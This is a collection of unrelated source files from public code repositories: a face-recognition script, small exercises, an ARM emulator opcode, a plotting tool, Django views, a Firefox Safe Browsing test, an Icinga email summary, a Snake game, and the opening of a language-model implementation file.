{"seq_id":"5932409474","text":"import cv2\nimport numpy as np\nimport os\n\nrecognizer = cv2.face.LBPHFaceRecognizer_create(radius=1, neighbors=8, grid_x=8, grid_y=8)\nrecognizer.read('trainer/trainer.yml')\n\nfaceCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_frontalface_alt2.xml') # haarcascade_frontalface_default.xml\neyeCascade = cv2.CascadeClassifier(cv2.data.haarcascades + 'haarcascade_eye_tree_eyeglasses.xml')\n\nfont = cv2.FONT_HERSHEY_SIMPLEX\n\n\ndef face_alignment(img, eye_position1, eye_position2):\n # face alignment based on the eye positions\n #if eye_position1 == None or eye_position2 == None:\n # return -1\n\n if eye_position1[0] < eye_position2[0]:\n left_eye = eye_position1\n right_eye = eye_position2\n else:\n left_eye = eye_position2\n right_eye = eye_position1\n\n # Calculating coordinates of the central points of the rectangles\n left_eye_center = (int(left_eye[0] + (left_eye[2] / 2)), int(left_eye[1] + (left_eye[3] / 2)))\n left_eye_x = left_eye_center[0]\n left_eye_y = left_eye_center[1]\n\n right_eye_center = (int(right_eye[0] + (right_eye[2] / 2)), int(right_eye[1] + (right_eye[3] / 2)))\n right_eye_x = right_eye_center[0]\n right_eye_y = right_eye_center[1]\n\n delta_x = right_eye_x - left_eye_x\n delta_y = right_eye_y - left_eye_y\n\n if delta_x == 0:\n delta_x = 1\n\n angle = np.arctan(delta_y / delta_x)\n angle = (angle * 180) / np.pi\n\n # Width and height of the image\n h, w = img.shape[:2]\n # Calculating a center point of the image\n # Integer division \"//\" ensures that we receive whole numbers\n center = (w // 2, h // 2)\n # Defining a matrix M and calling the cv2.getRotationMatrix2D method\n
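 # A positive angle rotates the image counter-clockwise about its centre, levelling the eye line.\n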
 M = cv2.getRotationMatrix2D(center, angle, 1.0)\n # Applying the rotation to our image using the\n # cv2.warpAffine method\n rotated_img = cv2.warpAffine(img, M, (w, h))\n\n return rotated_img\n\n\n# initiate id counter\nid = 0\n\n# names related to ids: example ==> mira: id=1, etc\nnames = ['none', 'mira', 'jihyun', 'inseong', 'hyunbin', 'jiwon', 'obama', 'son', 'jimi']\n\n# Initialize and start realtime video capture\ncam = cv2.VideoCapture(0)\ncam.set(3, 640) # set video width\ncam.set(4, 480) # set video height\n\n# Define min window size to be recognized as a face\nminW = 0.1 * cam.get(3)\nminH = 0.1 * cam.get(4)\n\nwhile True:\n ret, img = cam.read()\n\n if ret == False:\n continue\n\n #img = cv2.flip(img, -1) # Flip vertically\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(int(minW), int(minH)),\n )\n\n for (x, y, w, h) in faces:\n cv2.rectangle(img, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n face_img = gray[y:y + h, x:x + w]\n\n resizedface_img = cv2.resize(face_img, (300, 300))\n eyes = eyeCascade.detectMultiScale(\n resizedface_img,\n scaleFactor=1.1,\n minNeighbors=3\n )\n\n eye_1 = None\n eye_2 = None\n eye_cnt = len(eyes)\n if eye_cnt >= 2:\n eye_1 = eyes[0]\n eye_2 = eyes[1]\n # Drawing rectangles around the eyes\n # cv2.rectangle(face_img, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 3)\n #cv2.imshow('face', face_img)\n rotatedface_img = face_alignment(face_img, eye_1, eye_2)\n rotatedface_img = cv2.resize(rotatedface_img, (200, 200))\n else:\n rotatedface_img = cv2.resize(face_img, (200, 200))\n\n #cv2.imshow('rotated', rotatedface_img)\n #cv2.waitKey()\n\n ###########################################################\n id, confidence = recognizer.predict(rotatedface_img)\n ###########################################################\n\n if confidence < 500:\n confidence = int(100 * (1 - (confidence) / 300))\n\n # If confidence is less than 100 ==> \"0\" : perfect match\n if (confidence > 60):\n id = names[id]\n confidence = \" {0}%\".format(confidence)\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(confidence)\n\n '''if (confidence < 100):\n id = names[id]\n confidence = \" {0}%\".format(round(100-confidence))\n else:\n id = \"unknown\"\n confidence = \" {0}%\".format(round(100-confidence))'''\n\n cv2.putText(\n img,\n str(id),\n (x + 5, y - 5),\n font,\n 1,\n (255, 255, 255),\n 2\n )\n cv2.putText(\n img,\n str(confidence),\n (x + 5, y + h - 5),\n font,\n 1,\n (255, 255, 0),\n 1\n )\n\n cv2.imshow('camera', img)\n k = cv2.waitKey(10) & 0xff # Press 'ESC' for exiting video\n if k == 27:\n break\n\n# Do a bit of cleanup\nprint(\"\\n [INFO] Exiting Program and cleanup stuff\")\ncam.release()\ncv2.destroyAllWindows()","repo_name":"maira7/openCV_face","sub_path":"face_recg.py","file_name":"face_recg.py","file_ext":"py","file_size_in_byte":5019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"38029389815","text":"# https://www.hackerrank.com/challenges/sparse-arrays/problem?isFullScreen=true\n# Difficulty: Medium, Points: 25\n\n# Complexity: Time - O(n) and Space: O(n)\n\nfrom collections import Counter\n\ndef matchingStrings(strings, queries):\n freq1 = Counter(strings)\n \n result = [0] * len(queries)\n \n for i, q in enumerate(queries):\n if q in freq1:\n result[i] = freq1[q]\n \n
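 # Counter gives O(1) frequency lookups, so matching every query stays linear overall.\n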
 return result\n","repo_name":"HunkWhoCodes/HackerRank-Solutions","sub_path":"DataStructures/Arrays/SparseArrays.py","file_name":"SparseArrays.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"17165265622","text":"class Sentence:\n\tdef __init__(self,sen):\n\t\tself.sen=sen\n\tdef reverse(self):\n\t\tword=self.sen.split()\n\t\treverse=\"\"\n\t\tfor i in word:\n\t\t\treverse=i+\" \"+reverse\n\t\treturn reverse\n\tdef vowel(self):\n\t\tcount=0\n\t\tvo=['A','E','I','O','U','a','e','i','o','u']\n\t\tfor i in self.sen:\n\t\t\tif i in vo:\n\t\t\t\tcount=count+1\n\t\treturn count\n\nr1=Sentence(input())\nr2=Sentence(input())\nr3=Sentence(input())\n\nc1=r1.vowel()\nc2=r2.vowel()\nc3=r3.vowel()\n\n# a list of (count, sentence) pairs keeps sentences with equal vowel counts, which a dict keyed by count would drop\nworddes=[\n\t(c1,r1.reverse()),\n\t(c2,r2.reverse()),\n\t(c3,r3.reverse())\n\t]\n\nfor count,sentence in sorted(worddes, reverse=True):\n\tprint(count,sentence)\n","repo_name":"aman1698/Semester-5","sub_path":"SEE/6/6b.py","file_name":"6b.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"}
{"seq_id":"10915849614","text":"from armulator.armv6.bits_ops import substring\nfrom armulator.armv6.opcodes.abstract_opcodes.umaal import Umaal\n\n\nclass UmaalA1(Umaal):\n @staticmethod\n def from_bitarray(instr, processor):\n rn = substring(instr, 3, 0)\n rm = substring(instr, 11, 8)\n rd_lo = substring(instr, 15, 12)\n rd_hi = substring(instr, 19, 16)\n if rd_hi == 15 or rm == 15 or rn == 15 or rd_lo == 15 or (rd_lo == rd_hi):\n print('unpredictable')\n else:\n return UmaalA1(instr, m=rm, d_hi=rd_hi, d_lo=rd_lo, n=rn)\n","repo_name":"matan1008/armulator","sub_path":"armulator/armv6/opcodes/concrete/umaal_a1.py","file_name":"umaal_a1.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"68"}
{"seq_id":"17804135363","text":"#!/usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nimport argparse\nimport io\nimport code\nimport os.path\nimport scipy.optimize\n\n# compare numeric version components; a plain string comparison would misorder e.g. '1.9' and '1.14'\nif tuple(int(x) for x in np.__version__.split('.')[:3] if x.isdigit()) < (1, 14, 1):\n sys.exit(\"numpy version \" + np.__version__ + \" is too old\")\n \ndef open_3d_file(file):\n print(np.__version__)\n fh = open(file, 'r')\n header = fh.readline().rstrip()\n print(\"header: \", header)\n contents = fh.read().rstrip()\n \n list_of_blocks = contents.split(\"\\n\\n\")\n print(\"number of blocks: \", len(list_of_blocks))\n arrays = []\n for block in (list_of_blocks):\n arrays.append(np.genfromtxt(io.StringIO(block)))\n first_shape = arrays[0].shape\n for i in range(len(arrays)-1, -1, -1):\n shape = arrays[i].shape\n if shape != first_shape:\n print(\"block \", i, \" with first line\", arrays[i][0], \" does not match :\", shape, \" != \", first_shape)\n del arrays[i]\n return np.stack(arrays), header\n\ndef closest_index(array, value):\n if len(array.shape) != 1:\n sys.exit(\"argument of closest_index needs dimension 1\")\n \n abs_array = np.abs(array - value)\n index = np.where(abs_array == np.amin(abs_array))\n if len(index[0]) > 1:\n print(\"warning: multiple optimal values in closest_index\")\n index = index[0][0]\n value = array[index]\n return index, value\n\nparser = argparse.ArgumentParser()\n\n# mandatory arguments\nparser.add_argument('filename', help=\"input file\")\nparser.add_argument('OIZ', help=\"outer:inner:zcol description\")\nparser.add_argument('trace', help=\"o=value or i=value\")\n\n# output 
arguments\nparser.add_argument('-o', '--output', help=\"basename for output data file\")\nparser.add_argument('-f', '--force', action=\"store_true\", help=\"overwrite existing files\")\n\n# commands\nparser.add_argument('-c', '--command', action='append', default=[], help=\" transformation command, see below; can be provided multiple times\")\n\n# plot options\nparser.add_argument('-s', '--save-plot', help='save plot to filename. Suffix determines the format')\nparser.add_argument('--line', action='store_true')\n\n# fit functions\nparser.add_argument('--fit', help=\"fit type: 'linear', 'gaussian', 'lorentzian'\") \n\nargs = parser.parse_args()\nprint(args)\ncols = [int(x)-1 for x in args.OIZ.split(':')]\nif len(cols) != len(set(cols)):\n sys.exit(\"outer, inner, and z columns need to be unique\")\n\no_col, i_col, z_col = cols\ntrace_index, trace_value = args.trace.split('=')\nif trace_index != 'o' and trace_index != 'i':\n sys.exit(\"trace argument need to be o=value or i=value\")\n \ntrace_value = float(trace_value)\n\ndata_3d, header = open_3d_file(args.filename)\ncol_legends = header.split()[1:]\ncol_dict = {}\nprint(\"legends:\", col_legends)\nfor i, val in enumerate(col_legends):\n col_dict[i] = val\n\nprint(\"input data shape: \", data_3d.shape)\n\n# assume regular data: o11 = o12 = o13, ...; i11 = i21 = i31, ...\n\nif trace_index == 'o':\n trace_col = o_col\n o_vals = data_3d[:,0,o_col]\n o_index, value = closest_index(o_vals, trace_value)\n x_col = i_col\n x_vals = data_3d[o_index,:,x_col]\n z_vals = data_3d[o_index,:,z_col]\n \nelif trace_index == 'i':\n trace_col = i_col\n i_vals = data_3d[0, :, i_col]\n i_index, value = closest_index(i_vals, trace_value)\n x_col = o_col\n x_vals = data_3d[:,i_index, x_col]\n z_vals = data_3d[:,i_index, z_col]\n\nx_label = col_dict[x_col]\nz_label = col_dict[z_col]\n\ndef apply_commands(commands, x_vals, z_vals, x_label, z_label):\n for cmd in (commands):\n x_vals, z_vals, x_label, z_label = apply_command(cmd, x_vals, z_vals, x_label,\n z_label)\n return x_vals, z_vals, x_label, z_label\n\ndef apply_command(cmd, x_vals, z_vals, x_label, z_label):\n print(\"apply command\", cmd)\n if cmd in 'abs log log10'.split():\n z_vals = getattr(np, cmd)(z_vals)\n z_label = cmd + '(' + z_label + ')'\n elif cmd.startswith('xmin='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(x_vals < value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('xmax='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(x_vals > value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('zmin='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(z_vals < value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('zmax='):\n tmp,value = cmd.split('=')\n value = float(value)\n mask = np.where(z_vals > value)\n x_vals = np.delete(x_vals, mask)\n z_vals = np.delete(z_vals, mask)\n elif cmd.startswith('add='):\n tmp,value = cmd.split('=')\n value = float(value)\n z_vals = z_vals + value\n z_label = z_label + (\"%g\" % value)\n elif cmd.startswith('factor='):\n tmp,value = cmd.split('=')\n value = float(value)\n z_vals = value * z_vals\n z_label = (\"%g • \" % value) + z_label\n elif cmd == 'fft':\n z_vals = np.abs(np.fft.rfft(z_vals))\n x_vals = np.fft.rfftfreq(x_vals.shape[0], np.abs(x_vals[1]-x_vals[0]))\n z_label = \"|fft(%s)|\" % z_label\n x_label = \"freq(%s)\" % x_label\n \n else:\n 
sys.exit(\"unknown command \" + cmd)\n return x_vals, z_vals, x_label, z_label\n \nx_vals, z_vals, x_label, z_label = apply_commands(args.command, x_vals, z_vals,\n x_label, z_label)\n\nif args.output:\n if not args.force and os.path.isfile(args.output):\n sys.exit(\"file %s already exists. Use -f option to overwrite\" % args.output)\n output_block = np.stack([x_vals, z_vals], axis=-1)\n header = \"# %s\\t%s\" % (x_label, z_label)\n np.savetxt(args.output, output_block, fmt=\"%.17g\", header=header, comments='')\n\n\nlinestyle = \"-\" if args.line else \"\"\nplt.plot(x_vals, z_vals, marker=\"x\", linestyle=linestyle, label=\"%s=%g\" %( col_dict[trace_col], value))\n\ndef gaussian(x, *p):\n x0, w, A, a, b = p\n return A * np.exp(-1/2 * ((x-x0)/w)**2) + a*x + b\n\ndef lorentzian(x, *p):\n x0, w, A, a, b = p\n return A /(w**2 + (x-x0)**2) + a*x + b\n\nif args.fit:\n if args.fit == 'linear':\n coeff, V = np.polyfit(x_vals, z_vals, 1, cov=True)\n print(\"coeffs of linear fit: \", coeff)\n p = np.poly1d(coeff)\n cov = np.sqrt(np.diag(V))\n print(\"standard deviations: \", cov)\n label = \"%.3g(±%.2g) • %s %+.3g(±%.2g)\" % (coeff[0], cov[0], col_dict[x_col], coeff[1], cov[1])\n plt.plot(x_vals, p(x_vals), label=label)\n elif args.fit == 'gaussian':\n p0 = [(x_vals[-1] + x_vals[0])/2, 1, 1, 0, 0]\n popt, pcov = scipy.optimize.curve_fit(gaussian, x_vals, z_vals, p0=p0)\n print(\"fit parameters: \", popt)\n z_plot = gaussian(x_vals, *popt)\n label = 'gaussian(x_0 = %.4g, σ = %.3g)' % (popt[0], popt[1])\n plt.plot(x_vals, z_plot, label=label)\n elif args.fit == 'lorentzian':\n p0 = [(x_vals[-1] + x_vals[0])/2, 1, 1, 0, 0]\n popt, pcov = scipy.optimize.curve_fit(lorentzian, x_vals, z_vals, p0=p0)\n print(\"fit parameters: \", popt)\n z_plot = lorentzian(x_vals, *popt)\n label = 'lorentzian(x_0 = %.4g, w = %.3g)' % (popt[0], popt[1])\n plt.plot(x_vals, z_plot, label=label)\n else:\n sys.exit(\"unknown fit command %s\" % args.fit)\nplt.grid()\nplt.xlabel(x_label)\nplt.ylabel(z_label)\nplt.legend()\nplt.ticklabel_format(style='sci', axis='both')\n\nif args.save_plot:\n if not args.force and os.path.isfile(args.save_plot):\n sys.exit(\"file %s already exists. 
Use -f option to overwrite\" % args.save_plot)\n plt.savefig(args.save_plot, bbox_inches='tight')\nplt.show(block=False)\ncode.interact()\n","repo_name":"amba/plot_munger","sub_path":"plot_trace.py","file_name":"plot_trace.py","file_ext":"py","file_size_in_byte":7872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"3627700806","text":"from django.shortcuts import render\nimport cx_Oracle\nfrom django.http import HttpResponse\nfrom .models import House\nfrom .models import Character\nfrom .models import Battle\nimport urllib.request\n\n# Create your views here.\n\ndef index(request):\n\t'''con = cx_Oracle.connect('system/oracle@127.0.0.1:1521/xe')\n\tcur = con.cursor()\n\tcur.execute('SELECT * from battle')\n\tresult = cur.fetchall()\n\treturn HttpResponse(\"Valar Morghulis\")'''\n\tcharacters = Character.objects.all()\n\thouses = House.objects.all()\n\tbattles = Battle.objects.all()\n\t'''for character in characters:\n\t\t_characters.append(character.c_name.replace(' ','_'))'''\n\t'''for character in characters:\n\t\turllib.request.urlretrieve(character.c_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\House\")'''\n\treturn render(request,'index.html',{'characters':characters,'houses':houses,'battles':battles})\n\ndef house(request,pk):\n\thouse = House.objects.get(pk=pk)\n\t#urllib.request.urlretrieve(house.h_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\House\")\n\treturn render(request,'house.html',{'house':house})\n\ndef character(request,pk):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=pk)\n\t\t#urllib.request.urlretrieve(character.c_image,\"F:\\\\Programs\\\\Python-Programs\\\\Django-programs\\\\GameofThrones\\\\static\\\\GameofThrones\\\\images\\\\Character\")\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'characters.html',{'character':character})\n\ndef add_character(request):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=1)\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_character.html',{'character':character})\n\ndef new_character(request,pk):\n\ttry:\n\t\tcharacter = Character.objects.get(pk=pk)\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_character.html',{'character':character})\n\ndef delete_character(request):\n\ttry:\n\t\tcharacter = Character.objects.get()\n\texcept Character.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_delete.html',{'character':character})\n\ndef add_house(request):\n\ttry:\n\t\thouse = House.objects.get(pk=pk)\n\texcept House.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_house.html',{'house':house})\n\ndef add_battle(request):\n\ttry:\n\t\tbattle = Battle.objects.get(pk=pk)\n\texcept Battle.DoesNotExist:\n\t\traise Http404\n\treturn render(request,'new_battle.html',{'battle':battle})\n\n","repo_name":"csanjeev25/GameofThrones","sub_path":"GameofThronesApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9033618960","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n\nimport os\nfrom functools import reduce\n\nfrom firefox_puppeteer import PuppeteerMixin\nfrom marionette_driver import Wait\nfrom marionette_harness import MarionetteTestCase\n\n\nclass TestSafeBrowsingInitialDownload(PuppeteerMixin, MarionetteTestCase):\n\n file_extensions = [\n 'pset',\n 'sbstore',\n ]\n\n prefs_download_lists = [\n 'urlclassifier.blockedTable',\n 'urlclassifier.downloadAllowTable',\n 'urlclassifier.downloadBlockTable',\n 'urlclassifier.malwareTable',\n 'urlclassifier.phishTable',\n 'urlclassifier.trackingTable',\n 'urlclassifier.trackingWhitelistTable',\n ]\n\n prefs_provider_update_time = {\n # Force an immediate download of the safebrowsing files\n 'browser.safebrowsing.provider.google.nextupdatetime': 1,\n 'browser.safebrowsing.provider.mozilla.nextupdatetime': 1,\n }\n\n prefs_safebrowsing = {\n 'browser.safebrowsing.debug': True,\n 'browser.safebrowsing.blockedURIs.enabled': True,\n 'browser.safebrowsing.downloads.enabled': True,\n 'browser.safebrowsing.phishing.enabled': True,\n 'browser.safebrowsing.malware.enabled': True,\n 'privacy.trackingprotection.enabled': True,\n 'privacy.trackingprotection.pbmode.enabled': True,\n }\n\n def get_safebrowsing_files(self):\n files = []\n for pref_name in self.prefs_download_lists:\n base_names = self.marionette.get_pref(pref_name).split(',')\n for ext in self.file_extensions:\n files.extend(['{file}.{ext}'.format(file=f, ext=ext) for f in base_names if f])\n\n return set(sorted(files))\n\n def setUp(self):\n super(TestSafeBrowsingInitialDownload, self).setUp()\n\n # Force the preferences for the new profile\n enforce_prefs = self.prefs_safebrowsing\n enforce_prefs.update(self.prefs_provider_update_time)\n self.marionette.enforce_gecko_prefs(enforce_prefs)\n\n self.safebrowsing_path = os.path.join(self.marionette.instance.profile.profile,\n 'safebrowsing')\n self.safebrowsing_files = self.get_safebrowsing_files()\n\n def tearDown(self):\n try:\n # Restart with a fresh profile\n self.restart(clean=True)\n finally:\n super(TestSafeBrowsingInitialDownload, self).tearDown()\n\n def test_safe_browsing_initial_download(self):\n def check_downloaded(_):\n return reduce(lambda state, pref: state and int(self.marionette.get_pref(pref)) != 1,\n self.prefs_provider_update_time.keys(), True)\n\n try:\n Wait(self.marionette, timeout=60).until(\n check_downloaded, message='Not all safebrowsing files have been downloaded')\n finally:\n self.assertSetEqual(self.safebrowsing_files, set(os.listdir(self.safebrowsing_path)))\n","repo_name":"mozilla/positron","sub_path":"testing/firefox-ui/tests/functional/security/test_safe_browsing_initial_download.py","file_name":"test_safe_browsing_initial_download.py","file_ext":"py","file_size_in_byte":3069,"program_lang":"python","lang":"en","doc_type":"code","stars":553,"dataset":"github-code","pt":"68"}
{"seq_id":"71923501657","text":"#!/usr/bin/env python3\n\nimport logging\nfrom os import path\nfrom datetime import datetime\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom smtplib import SMTP\n\nfrom icinga2apic.client import Client\nfrom jinja2 import Environment, FileSystemLoader, select_autoescape\n\nfrom config import (from_addr, host_colors, icinga_apipassword, icinga_apiuser,\n icinga_host, log_file, log_format, log_level, send_mail,\n service_colors, smtp_host, smtp_password, smtp_port,\n smtp_username, subject, use_allowlist)\n\n
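# Collapse the four numeric Icinga check states into a binary UP/DOWN label for the summary email.\n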
2: \"DOWN\",\n 3: \"DOWN\"}\n\n\nservice_states = {0: \"OK\",\n 1: \"WARNING\",\n 2: \"CRITICAL\",\n 3: \"UNKNOWN\"}\n\nroot = path.dirname(path.abspath(__file__))\n\ndef notifications_recipients(host):\n \"\"\"Retrieve all users of a host, that want to receive emails\"\"\"\n vars = host.get('vars', {})\n if vars is None:\n return None\n return vars.get('notification', {}).get('mail', {}).get('users')\n\n\ndef timestamp2str(timestamp):\n \"\"\"Convert Unix timestamp to a string\"\"\"\n time = datetime.fromtimestamp(timestamp)\n time_format = \"%H:%M\" if time.date() == datetime.today().date() else \"%d-%b-%y\"\n return time.strftime(time_format)\n\n\ndef setup():\n \"\"\"Sets up the logging, the icinga2 client and the email body template\"\"\"\n logging.basicConfig(filename=log_file, filemode='w', format=log_format,\n level=log_level)\n logging.info('Creating Icinga Email-Summary...')\n\n # set up the icinga2 client (https://github.com/TeraIT-at/icinga2apic)\n client = Client(icinga_host, icinga_apiuser, icinga_apipassword)\n\n # set up jinja2 template\n templates_dir = path.join(root, 'templates')\n env = Environment(\n loader=FileSystemLoader(templates_dir),\n autoescape=select_autoescape()\n )\n mail_template = env.get_template('email.html')\n\n return client, mail_template\n\n\ndef retrieve_and_clean_api_data(client):\n \"\"\"\n Retrieves users, hosts, services from the Icinga API.\n Removes everything except the 'attrs' field.\n Tranforms users and hosts to dictionaries to get faster access.\n \"\"\"\n user_attrs = ['email']\n users = client.objects.list('User', attrs=user_attrs)\n users = {user['name']: user['attrs'] for user in users}\n\n host_attrs = ['address', 'display_name', 'handled', 'last_check_result',\n 'last_hard_state_change', 'problem', 'vars']\n hosts = client.objects.list('Host', attrs=host_attrs)\n hosts = {host['name']: host['attrs'] for host in hosts}\n\n service_attrs = ['display_name', 'host_name', 'last_check_result',\n 'last_hard_state_change']\n services = client.objects.list('Service',\n filters='match(\"True\", service.problem) && '\n 'match(\"False\", service.handled) && '\n 'match(\"True\", service.last_reachable)',\n attrs=service_attrs)\n services = [service['attrs'] for service in services]\n services = sorted(services, key=lambda d: d['last_hard_state_change'],\n reverse=True)\n return users, hosts, services\n\n\ndef sorting(x):\n \"\"\"\n Hosts are sorted by the change_time of their most recent service problem. If\n the host itself is down, its own change_time is used.\n \"\"\"\n return x['services'][0]['change_time'] if len(x['services']) > 0 else x[\n 'change_time']\n\n\ndef assign_services_to_hosts(services, hosts):\n \"\"\"\n Hosts are reduced to their essential information, that is then recognized\n by the jinja2 template. 
Services are assigned to their corresponding host.\n \"\"\"\n problem_hosts = {}\n for host_name, host_info in hosts.items():\n if host_info['problem'] and not host_info['handled']:\n timestamp = host_info['last_hard_state_change']\n time_str = timestamp2str(timestamp)\n problem_hosts[host_name] = {'name': host_name,\n 'address': host_info['address'],\n 'state': host_info['last_check_result']['state'],\n 'recipients': notifications_recipients(host_info),\n 'change_time': timestamp,\n 'change_time_str': time_str,\n 'output': host_info['last_check_result']['output'],\n 'services': []}\n for service_info in services:\n service_host = hosts[service_info['host_name']]\n timestamp = service_info['last_hard_state_change']\n time_str = timestamp2str(timestamp)\n service = {'name': service_info['display_name'],\n 'state': service_info['last_check_result']['state'],\n 'change_time': timestamp,\n 'change_time_str': time_str,\n 'output': service_info['last_check_result']['output'],\n 'services': []}\n default_host = {'name': service_host['display_name'],\n 'address': service_host['address'],\n 'state': service_host['last_check_result']['state'],\n 'recipients': notifications_recipients(service_host),\n 'change_time_str': timestamp2str(service_host['last_hard_state_change']),\n 'output': None,\n 'services': []}\n # if host does not exist yet in host_problems, create a new one and add the service\n problem_hosts.setdefault(service_info['host_name'], default_host)[\n 'services'].append(service)\n\n problem_hosts = list(problem_hosts.values())\n problem_hosts = sorted(problem_hosts, key=sorting, reverse=True)\n\n return problem_hosts\n\n\ndef assign_hosts_to_users(problem_hosts, users):\n \"\"\"\n Creates a dictionary of all to be contacted email-addresses and their\n corresponding host problems.\n \"\"\"\n # keys: user email address, value: hosts for which user should receive emails\n user_notifications = {}\n\n # assign each user its hosts\n for host in problem_hosts:\n recipients = host['recipients']\n if recipients:\n for recipient in recipients:\n emails = users[recipient].get('email').replace(' ', '').split(',')\n for mail_address in emails:\n if mail_address: # filter out empty strings\n user_notifications.setdefault(mail_address, []).append(host)\n\n return user_notifications\n\n\ndef send_emails(smtp, user_notifications, mail_template):\n \"\"\"Creates the email body from the template and sends it.\"\"\"\n allowlist = []\n if use_allowlist:\n allowlist_path = path.join(root, 'allowlist.txt')\n with open(allowlist_path, 'r') as f:\n for line in f:\n allowlist.append(line.rstrip('\\n'))\n\n for mail_address, host_list in user_notifications.items():\n if use_allowlist and mail_address not in allowlist:\n continue\n\n try:\n msg = MIMEMultipart('alternative')\n msg['Subject'] = subject\n msg['From'] = from_addr\n msg['To'] = mail_address\n msg_body = mail_template.render(hosts=host_list,\n host_colors=host_colors,\n service_colors=service_colors,\n host_states=host_states,\n service_states=service_states)\n msg.attach(MIMEText(msg_body, 'html'))\n\n if send_mail:\n smtp.sendmail(from_addr, mail_address, msg.as_string())\n except Exception:\n logging.exception(f'Could not send email to {mail_address}')\n\n\ndef main():\n icinga2_client, mail_template = setup()\n with SMTP(smtp_host, smtp_port) as smtp:\n if smtp_username and smtp_password:\n smtp.login(smtp_username, smtp_password)\n\n users, hosts, services = retrieve_and_clean_api_data(icinga2_client)\n problem_hosts = 
assign_services_to_hosts(services, hosts)\n user_notifications = assign_hosts_to_users(problem_hosts, users)\n\n send_emails(smtp, user_notifications, mail_template)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"faberno/icinga2-email-summary","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"13122260183","text":"from turtle import Screen\nimport time\nfrom Snake import Snake\nfrom food import Food\nfrom scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"black\")\nscreen.title(titlestring=\"Snake Game\")\nscreen.tracer(0)\nscoreboard = Scoreboard()\nfood = Food()\nsnake = Snake()\n\n\nscreen.listen()\nscreen.onkey(key=\"Up\", fun=snake.move_up)\nscreen.onkey(key=\"Down\", fun=snake.move_down)\nscreen.onkey(key=\"Left\", fun=snake.move_left)\nscreen.onkey(key=\"Right\", fun=snake.move_right)\n\n\ngame_is_on = True\nwhile game_is_on:\n screen.update()\n time.sleep(0.1)\n snake.move()\n\n if snake.head.distance(food) < 15:\n food.update()\n scoreboard.addScore()\n snake.extend()\n\n if snake.head.xcor() > 280 or snake.head.xcor() < -280 or snake.head.ycor() > 280 or snake.head.ycor() < -280:\n scoreboard.reset()\n snake.reset()\n\n for segment in snake.segments[1:]:\n if snake.head.distance(segment) < 10:\n scoreboard.reset()\n snake.reset()\n\n\n\nscreen.exitonclick()\n","repo_name":"kar1221/snakeGame","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36532840668","text":"from typing import Optional, Tuple, Union\n\nimport torch\nimport torch.utils.checkpoint\nfrom torch import nn\nfrom torch.nn import CrossEntropyLoss\nfrom transformers.modeling_outputs import (BaseModelOutputWithPast,\n CausalLMOutputWithPast)\nfrom transformers.modeling_utils import PreTrainedModel\nfrom transformers.utils import logging\n\nfrom .configuration_japanese_stablelm_alpha import JapaneseStableLMAlphaConfig\n\nlogger = logging.get_logger(__name__)\n\n\nclass JapaneseStableLMAlphaPreTrainedModel(PreTrainedModel):\n \"\"\"\n An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained\n models.\n \"\"\"\n\n config_class = JapaneseStableLMAlphaConfig\n base_model_prefix = \"transformer\"\n supports_gradient_checkpointing = True\n _no_split_modules = [\"DecoderLayer\"]\n _skip_keys_device_placement = \"past_key_values\"\n\n def _init_weights(self, module):\n \"\"\"Initialize the weights\"\"\"\n if isinstance(module, nn.Linear):\n module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.Embedding):\n 